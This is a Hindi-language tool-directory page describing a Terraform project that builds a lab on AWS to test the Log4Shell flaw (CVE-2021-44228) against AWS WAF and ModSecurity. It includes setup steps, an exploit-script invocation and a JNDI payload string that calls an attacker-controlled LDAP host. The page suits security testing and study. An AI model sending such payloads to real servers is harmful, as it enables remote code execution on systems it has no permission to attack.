Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
tf-log4j-aws-poc — यह प्रोजेक्ट फाइलें Terraform के Infrastructure-as-a-code माध्यम का उपयोग करके AWS पर log4j भेद्यता (CVE-2021-44228) का एक proof-of-concept प्रदर्शित करती हैं। | Kitploit
उपकरण/GitHubGitHub/moshuum/tf-log4j-aws-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षा
GitHubmoshuum/tf-log4j-aws-poc

tf-log4j-aws-poc

यह प्रोजेक्ट फाइलें Terraform के Infrastructure-as-a-code माध्यम का उपयोग करके AWS पर log4j भेद्यता (CVE-2021-44228) का एक proof-of-concept प्रदर्शित करती हैं।

रिपॉजिटरी देखें
124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

पढ़ें

परियोजना विवरण

यह प्रोजेक्ट फ़ाइलें AWS पर Terraform इन्फ्रास्ट्रक्चर-एज़-कोड माध्यमों का उपयोग करके log4j भेद्यता (CVE-2021-44228) के प्रूफ-ऑफ-कॉन्सेप्ट को प्रदर्शित करती हैं।

इस प्रोजेक्ट में 2 डेमो हैं:

  1. single-instance में एक भेद्य सर्वर है, आप अपने व्यक्तिगत कंप्यूटर का उपयोग सर्वर का शोषण करने के लिए कर सकते हैं, सर्वर को AWS WAF से संरक्षित किया जाना चाहिए।
  2. double-instance में 2 सेवाएँ हैं, भेद्य सर्वर केवल रिवर्स प्रॉक्सी सर्वर से ही पहुँचा जा सकता है, रिवर्स प्रॉक्सी को ModSecurity द्वारा संरक्षित किया जाना चाहिए।

निष्कर्ष: पहला डेमो AWS WAF का उपयोग करके एक सफल शोषण प्रदर्शित करता है। दूसरा डेमो एक असफल प्रयास था जब ModSecurity स्थापित था। ModSecurity को हटाने पर शोषण सफल होगा। ऐसा हो सकता है क्योंकि ModSecurity एक सक्रिय परियोजना है, इसलिए भेद्य स्ट्रिंग्स की पहचान कर फ़िल्टर कर दी गई हैं।

श्रेय

यह पीओसी निम्नलिखित से लिया गया था: https://github.com/kozmer/log4j-shell-poc

यह मीडियम ब्लॉग बताता है कि उसका प्रयास कैसे हुआ: https://chennylmf.medium.com/apache-log4j-shell-poc-exploits-5953c42fa873

मेरा परीक्षण

व्यक्तिगत रूप से, मैंने Windows + Powershell का उपयोग करके परीक्षण किया, क्लाउड मशीन Ubuntu 18 LTS है। (kali या किसी भी लिनक्स के साथ शोषण)

पूर्व-आवश्यकता

  1. AWS_CLI स्थापित हो
  2. Terraform CLI स्थापित हो
  • एक्सेस कुंजी तैयार हो
  • RSA कुंजी

    वेब के माध्यम से बनाएं (इसे 'tf-aws' नाम दें): https://console.aws.amazon.com/ec2/v2/home?#KeyPairs

    एक्सेस कुंजी प्राप्त करें

    https://us-east-1.console.aws.amazon.com/iamv2/home#/users > उपयोगकर्ता चुनें > अनुभाग security_credentials चुनें

    शेल में एक्सेस कुंजी सेट करें

    Powershell: $env:AWS_ACCESS_KEY_ID="<user access key input>" $env:AWS_SECRET_ACCESS_KEY="<secret key input>" $env:AWS_DEFAULT_REGION="<region>"

    Linux: export AWS_ACCESS_KEY_ID="<user access key input>" export AWS_SECRET_ACCESS_KEY="<secret key input> export AWS_DEFAULT_REGION="<region>"

    उपयोग

    AWS प्लेटफॉर्म पर EC2 सेटअप करें

    cd single-instance terraform init terraform apply

    चलाने के बाद, एक IP / DNS सूचीबद्ध होगा।

    single-instance के लिए, सुनिश्चित करें कि http:<aws host url>:8080 सुलभ है

    double-instance के लिए, सुनिश्चित करें कि http:<aws host url> सुलभ है

    * कृपया ध्यान दें कि 'double-instance' को चालू करने में अधिक समय लगता है, आप ssh के बाद journalctl -f का उपयोग प्रगति को ट्रैक करने के लिए कर सकते हैं

    यदि आप journal का अनुसरण करते हैं, "Reached target Cloud-init target." का अर्थ है कि यह तैयार अवस्था में है। exploit

    रिमोट / लोकलहोस्ट क्लाइंट (हमलावर) तैयार करें:

    निष्पादन अनुमति सेट करें chmod +x ../exploit-script-remote.sh

    आपूर्ति किए गए चर के साथ स्क्रिप्ट चलाएं ../exploit-script-remote.sh

    ध्यान दें कि पेलोड स्क्रिप्ट के अंत में ${jndi:ldap://<ip-address>:1389/a} जैसा प्रदर्शित होता है

    भेद्य सर्वर:

    http:<aws host url>:8080 पर जाएं

    पेलोड को 'username' फ़ील्ड में कॉपी करें और फॉर्म सबमिट करें

    exploit

    टिप्पणी

    JDK फ़ाइल: सुनिश्चित करें कि baidu स्रोत से अखंडता Oracle के समान हैश है SHA256 187EDA2235F812DDB35C352B5F9AA6C5B184D611C2C9D0393AFB8031D8198974

    संदर्भ

    इंस्टेंस: https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/instance

    स्पॉट इंस्टेंस: https://www.tderflinger.com/en/ec2-spot-with-terraform

    SSH: https://jhooq.com/terraform-ssh-into-aws-ec2/ https://docs.aws.amazon.com/cli/latest/userguide/cli-services-ec2-keypairs.html

    [चलते-फिरते ssh कुंजी] https://stackoverflow.com/questions/49743220/how-do-i-create-an-ssh-key-in-terraform

    WAF: https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/waf_rule https://medium.com/kudos-engineering/terraforming-amazons-web-application-firewall-e5c22b7d317d https://www.linode.com/docs/guides/securing-nginx-with-modsecurity/

    टेम्पलेटिंग: https://spacelift.io/blog/terraform-templates

    AWS AZ ID: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-availability-zones

    सीखी गई बातें

    • (बहुत समय लगा) प्रोविज़नर के रूप में bash स्क्रिप्ट का उपयोग न करें / इसके बजाय टेम्पलेट का उपयोग करें (बेहतर तरीके से विशेषाधिकार को कम करने की संभावना देख सकते हैं)
    • वेब से उत्पन्न RSA कुंजी aws-cli से मैन्युअल रूप से उत्पन्न की तुलना में अधिक विश्वसनीय है यदि .pem का उपयोग कर रहे हैं (.pem फ़ाइल की SSH क्लाइंट या AWS सर्वर के साथ संगतता) अन्यथा .pem के बिना सामान्य rsa कुंजी का उपयोग करें।
    • कुछ लागत बचत के लिए सामान्य के बजाय स्पॉट इंस्टेंस का उपयोग करने में सफलता मिली
    • Docker पोर्ट को एक्सपोज़ करना फ़ायरवॉल नियमों को ओवरराइट कर सकता है
    • (बहुत समय लगा) नेटवर्किंग सेटअप और समस्या निवारण में बहुत समय लगता है - रूट, vpc को 1 sec-group की आवश्यकता है और ec2 होस्ट को दूसरे sec-group की आवश्यकता है - और दोनों sec-group को vpc की ओर इशारा करना होता है
    • wget लंबी डाउनलोड सत्र नहीं कर सकता

    # समय रिकॉर्डिंग

    • प्रारंभ 06 जून 11AM UTC+0800 - 07 जून 4AM (पूर्ण poc+tf+aws -waf) - 17 घंटे
    • प्रारंभ 07 जून 1PM UTC+0800 - 08 जून 5AM (दूसरा मामला पूरा जहां रिवर्स प्रॉक्सी का उपयोग किया गया)
    टूल डाउनलोड करें